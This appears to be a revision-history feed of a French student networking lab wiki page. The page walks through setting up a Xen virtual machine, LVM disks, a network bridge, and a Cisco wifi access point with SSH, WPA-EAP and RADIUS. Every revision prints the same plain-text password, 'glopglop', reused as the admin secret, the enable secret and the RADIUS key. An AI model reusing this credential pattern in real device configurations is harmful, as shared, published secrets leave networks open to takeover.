 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56018</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56018"/>
				<updated>2021-09-30T11:07:21Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Configuration du point d'accés wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56017</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56017"/>
				<updated>2021-09-30T11:06:46Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Passerelle capbreton */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
Réinitialisation des paramètres de la borne wifi :&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
'''&lt;br /&gt;
Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
'''&lt;br /&gt;
VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56016</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56016"/>
				<updated>2021-09-30T11:00:35Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Passerelle capbreton */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56015</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56015"/>
				<updated>2021-09-30T10:56:59Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
